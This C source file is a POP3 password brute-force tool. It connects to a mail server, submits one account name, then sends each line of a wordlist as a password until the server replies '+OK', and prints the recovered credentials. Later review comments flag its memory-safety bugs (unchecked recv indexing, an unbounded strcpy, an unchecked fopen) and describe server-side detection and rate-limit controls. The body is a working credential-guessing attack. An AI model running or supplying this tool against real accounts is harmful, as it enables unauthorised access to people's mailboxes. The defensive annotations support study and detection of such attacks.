/***********************************************/
/*
/* pop3bf.c - Simple POP3 brute force tool
/*
/* by aton
/*
/* copyleft:
/* copy it, use it, modify it, i dont care
/*
/***********************************************/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include //for non-blocking
#include //for timeval()
#include
#define LEN 255 // max bytes requested per recv(); buf is declared LEN+1 so one byte remains for the terminator
// main - connect to a POP3 server and submit each line of a wordlist file as
// the password for one account, stopping at the first "+OK" reply.
//
// Command line (exactly four arguments, enforced by the argc check):
//   argv[1]  server host name, resolved with gethostbyname()
//   argv[2]  TCP port; when atoi() yields 0 the code falls back to 110
//   argv[3]  account name placed in the "user" command
//   argv[4]  path of the candidate file, one password per line
//
// Returns 0 once the loop ends. Exits with status 1 on a usage error, a
// resolver failure, a socket() failure, or a connect() failure other than
// EINPROGRESS.
//
// Defender's view: every guess goes over a single plain-TCP connection
// (nothing here negotiates TLS) as one "user" command followed by
// back-to-back "pass" commands with no delay. On the server side that would
// typically appear as a burst of failed logins for one account from one
// source address, so per-account and per-source failure limits, dropping the
// connection after a few failed attempts, and alerting on failure bursts are
// the relevant controls.
//
// NOTE(review): the memory-safety and error-handling defects flagged inline
// are left exactly as found.
int main(int argc, char *argv[])
{
// sd: socket descriptor; num: result of the last recv(); i: attempt counter
// used only for the progress dots. n is never used.
int sd, num, i=0, port=0, n=0;
// Receive buffer; recv() is asked for at most LEN bytes, leaving one spare byte.
char buf[LEN+1]="\0";
char user[256], curpass[256], cmd[512];
struct sockaddr_in servaddr; // connector's address information
struct hostent *he;
FILE *fd;
// The usage line below prints only the program name; the parameter names were
// presumably lost when the page was extracted (see the argument list above).
if (argc != 5)
{
printf("pop3 brute force - by aton\n");
printf("usage: %s \n", argv[0]);
exit(1);
}
if ((he=gethostbyname(argv[1])) == NULL) // get the host info
{
perror("gethostbyname");
exit(1);
}
// atoi() reports no errors: non-numeric input yields 0 and silently selects
// port 110. NOTE(review): the value is not range-checked before htons().
if ((port=atoi(argv[2])) == 0 ) port=110;
fd=fopen(argv[4], "r");
// NOTE(review): a failed fopen() is only reported; execution continues and the
// NULL stream is later handed to fgets()/feof(), which is undefined behaviour.
if (fd==NULL)
{
printf("error: couldnt open file: %s\n", argv[4]);
}
if ((sd = socket(AF_INET, SOCK_STREAM, 0)) < 0) // open a socket
{
perror("socket");
exit(1);
}
servaddr.sin_family = AF_INET;
// host byte order
servaddr.sin_port = htons(port); // short, network byte order
// Uses the resolver's h_addr entry as the IPv4 address to connect to.
servaddr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(servaddr.sin_zero), '\0', 8); // zero the rest of the struct
fprintf(stdout, "\n===== pop3 brute force by aton =====\n\n");
// A connect() failure exits without printing any message, unless errno is
// EINPROGRESS. No call in this function makes the socket non-blocking, so the
// EINPROGRESS branch is presumably a leftover - TODO confirm.
if (connect(sd, (struct sockaddr *)&servaddr,sizeof(servaddr)) < 0) // connect
{
if (errno!=EINPROGRESS)
exit(1);
}
// Prints the raw argv[2] text, not the effective port (differs after the
// fallback to 110).
printf("connected to %s:%s.\n\n", argv[1], argv[2]);
printf("wainting for server welcome message...\n");
// NOTE(review): recv() can return -1 (error) or 0 (peer closed). The result is
// used as an index unchecked, so -1 writes buf[-1], outside the array.
num=recv(sd, buf, LEN, 0); //read from socket
buf[num]=0;
printf("%s\n", buf);
// NOTE(review): unbounded strcpy(); an argv[3] longer than 255 bytes overflows
// user[256].
strcpy(user, argv[3]);
strcpy(cmd, "user ");
strcat(cmd, user);
printf("-> %s\n", cmd);
// strlen(cmd)+1 also transmits the string's terminating NUL byte. A NUL inside
// a POP3 command stream is an unusual artefact that network monitoring can
// match on. A send() failure is only reported; the program carries on.
if (send(sd, cmd, strlen(cmd)+1,0) == -1) // send username
perror("send");
// NOTE(review): same unchecked recv() result used as an index as above.
num=recv(sd, buf, LEN, 0); //read from socket
buf[num]='\0';
printf("%s\n",buf);
printf("authenticating :)\n");
printf(".\n");
// One iteration per wordlist line; leaves the loop on end of file or on the
// first reply that starts with "+OK".
do
{
// fgets() keeps the line's trailing newline in curpass, so the newline is part
// of what is printed and sent below. Its return value is not checked; only
// end-of-file is tested, so a read error that is not EOF goes undetected.
fgets(curpass, sizeof(curpass), fd);
if (feof(fd)!=0)
{
printf("end of file reached for %s\n", argv[4]);
break;
}
// i wraps back to 0 after 10000; it drives only the progress output below.
i++; if (i>10000) i=0;
// "pass " plus at most 255 bytes from curpass fits in cmd[512].
strcpy(cmd, "pass ");
strcat(cmd, curpass);
// Every candidate is echoed to stdout.
printf("%s\n", curpass);
if (send(sd, cmd, strlen(cmd)+1, 0) == -1) //send password
perror("send");
// NOTE(review): recv() result unchecked here as well (-1 indexes buf[-1]).
// buf[3]=0 cuts the reply to three characters, so the decision rests solely
// on the first three bytes of whatever this single recv() returned.
num=recv(sd, buf, LEN, 0); //read from socket
buf[num]=0; buf[3]=0;
if (strcmp(buf, "+OK")==0)
{
// The account name and the accepted password are written to stdout in clear text.
printf("user: \"%s\" password: \"%s\"\n\n", user, curpass);
break;
}
// Progress marker: one dot for every 100 attempts.
else if ((i%100)==0) printf(".\n");
} while (1);
// Only the socket is closed; the wordlist stream fd is never fclose()d.
close(sd);
return 0;
}